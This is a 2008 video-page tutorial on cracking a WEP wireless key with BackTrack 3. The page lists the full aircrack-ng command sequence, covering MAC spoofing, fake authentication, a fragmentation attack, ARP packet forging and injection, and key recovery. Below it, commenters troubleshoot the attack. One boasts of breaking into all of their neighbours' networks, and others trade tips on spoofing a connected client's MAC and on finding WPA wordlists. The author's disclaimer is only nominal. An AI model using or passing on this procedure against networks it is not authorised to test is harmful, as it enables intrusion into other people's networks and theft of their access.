WEP Crack with Backtrack 3

Tags:
Aircrack Backtrack Computers Crack Linux Ng Slackware Tutorials Wep Wi-Fi
thepaperboi
  • Affiliate Submitter:
    thepaperboi
  • International International
  • Comments: 3
  • Views: 17,887
  • Added: 19-Aug-08

This is a tutorial on how to crack a WEP code on a wireless access point. Here are the commands I use:

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0

Pick your target, copy it's BSSID, press ctrl + C to end airodump.

airodump-ng -c (channel) -w wep --bssid (paste AP's mac here) wlan0

Open a new KONSOLE:
aireplay-ng -1 0 -a (paste AP) -h 00:11:22:33:44:55 wlan0

Smilieface = Success. :-)

aireplay-ng -5 -b (paste AP) -h 00:11:22:33:44:55 wlan0

A packet will pop up, verify that the MAC is the same MAC of your target.
Press Y if it is, N if it's not.

packetforge-ng -0 -a (paste AP) - h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y ( the .xor filename, starts with fragment..) -w ARP

aireplay-ng -2 -r ARP wlan0

Press Y.

Will start injecting, data packets will rise like crazy. When enough data is obtained..

aircrack-ng wep-01.cap

--------------------------------------

If you have questions please ask in the comments!

--------------------------------------

Card Compatability links:
http://aircrack-ng.org/doku.php?id=compatibility_drivers#compatibility
http://backtrack.offensive-security.com/index.php/Hardware_Compatibility

  1. Categories: How To, Science & Tech
  2. Favorite On: shadew 1966nightwolf
Comments on

WEP Crack with Backtrack 3

17 Comments | Add Comment
  • Need help

    Waht are the com. to open a new shell while its geting the pack. pls help

    By igor4375 1234936536 Reply Spam Moderate Up Moderate Down
  • WORKS! If you put in the extra effort

    I used this as my primary guide, and it works! By itself? No. I did a LOT of extra searching so that I could get packet injection (else I'd be waiting a few days to hack one AP). I have the Intel 3945ABG, so I had to get the ipwraw driver (rather than the default iwl3945).

    Sure it takes extra work. But then... I don't want every noob hacker to be able to pwn my network without at least knowing what they're doing.

    Keep up the good work. Love this video. Average quality (sound, text clarity, speech not in sync with the text, etc), but it gives me what I need :). Took me about 1 full day to figure everything out... and hack all of my neighbor's networks (apartment=high density of networks).

    If you want to, try and explain a bit more about what and why we're doing--rather than "just follow this video exactly". Makes us smarter with linux.

    By sitygeo 1231024920 Reply Spam Moderate Up Moderate Down
  • Hi, Im fairly ...

    Hi,

    Im fairly new to backtrack and watching your vid has helped me a bit. But I still have one more question. Does my network card work automatically or do I have to install drivers in the modules folder of the BT3 iso for it to work.

    Thanks:)

    By t3chno15123 [Affiliate User] 1224420414 Reply Spam Moderate Up Moderate Down
  • Hey when i do this ...

    Hey when i do this the #data packets don't increase (they stay at zero)

    Does anyone know why?

    By XColorMeEvilX [Affiliate User] 1224367263 Reply Spam Moderate Up Moderate Down
  • I finally got it ...

    I finally got it working.. The method for asus eee pc is kinda different than the tutorial,. but it's easy to figure out.
    =)
    happy hacking..

    By hackersbox [Affiliate User] 1223374039 Reply Spam Moderate Up Moderate Down
  • can't make it work ...

    can't make it work at my 701 4G =(

    By hackersbox [Affiliate User] 1223371419 Reply Spam Moderate Up Moderate Down
  • thanks for sharing. ...

    thanks for sharing.. =) i'm trying it now using my Hackbook, Asus 701 4G.

    By hackersbox [Affiliate User] 1223354972 Reply Spam Moderate Up Moderate Down
  • 10k views! You evil ...

    10k views! You evil people you! :P

    Friendly reminder to all - This was designed to see if your own security is penetrable, and make it better!

    This can be used to hack random wep coded AP points, this is true, but if you decide to do that, you are responsible for it!

    By thepaperboi [Affiliate User] 1223186347 Reply Spam Moderate Up Moderate Down
  • Hmmmm.. well, I say ...

    Hmmmm.. well, I say you should go to the remote exploit forums, the link is in the description..

    The alfa should work, they're great products..

    By thepaperboi [Affiliate User] 1223175960 Reply Spam Moderate Up Moderate Down
  • that makes me sad . ...

    that makes me sad ... payed 100 euro for my wlan equip ... what should i do may download the newest version of aircrack ... i am using the alfa usb wlan adapter

    By MxTasy [Affiliate User] 1223137968 Reply Spam Moderate Up Moderate Down
  • 2 million as in ...

    2 million as in
    2,000,000?

    Usually you need 20 thousand..
    20,000.

    That's not normal. lol

    By thepaperboi [Affiliate User] 1223125820 Reply Spam Moderate Up Moderate Down
  • I have captured 2 ...

    I have captured 2 million IVs now and Aircrack-ng still havent the key now ...
    How much more pakcets do i need xD ...
    Or isnt this normal?

    By MxTasy [Affiliate User] 1223120920 Reply Spam Moderate Up Moderate Down
  • 1. yes, remove the ...

    1. yes, remove the :'s from the key and you'll have it.
    2. Injection is for speed, correct.
    3. If you do some googling around you'll find a few great wordlists, but for a starter I recomend the remote-exploit forums, I'm sure I left the link to that in the description of the video somewhere!

    Search search search! lol

    By thepaperboi [Affiliate User] 1222899760 Reply Spam Moderate Up Moderate Down
  • 1. ok, i copy that ...

    1. ok, i copy that key as it is, and i'll have axs, right?

    2. got it. injection is to accelerate speed and do things quicker, right?

    3. can you recommend me a nice wordlist or rainbow table or anything to begin playing with the wpa-psk AP? At least i know the device has a spanish passphrase of 8 chars minimmum lol

    By quiquedcode [Affiliate User] 1222894558 Reply Spam Moderate Up Moderate Down
  • It didn't work, ...

    It didn't work, something else must be occurring. I found an associated client, waited for it to go offline, spoofed its MAC and tried to inject but I still couldn't connect. It could be that the client was still associated, but not exchanging data with the AP so airdump didn't show them as connected, I'm not sure.

    By ezhik99 [Affiliate User] 1222750717 Reply Spam Moderate Up Moderate Down
  • Thanks for the ...

    Thanks for the extra info. I will try later and report back, though it's a lovely hot sunny Sunday morning here in Turkey and I have another job to do first, to go to the beach and check out man's best invention - the bikini. Then I will work on the second best, the computer!
    Thank you for your help.

    By ezhik99 [Affiliate User] 1222583214 Reply Spam Moderate Up Moderate Down
  • Please tell me if ...

    Please tell me if it works, I'm interested!

    Also, if you do manage to get the mac from someone and try to connect with it, it may not allow you because someone with the same mac is connected; try it when they disconnect!

    By thepaperboi [Affiliate User] 1222580982 Reply Spam Moderate Up Moderate Down
17 Comments | Add Comment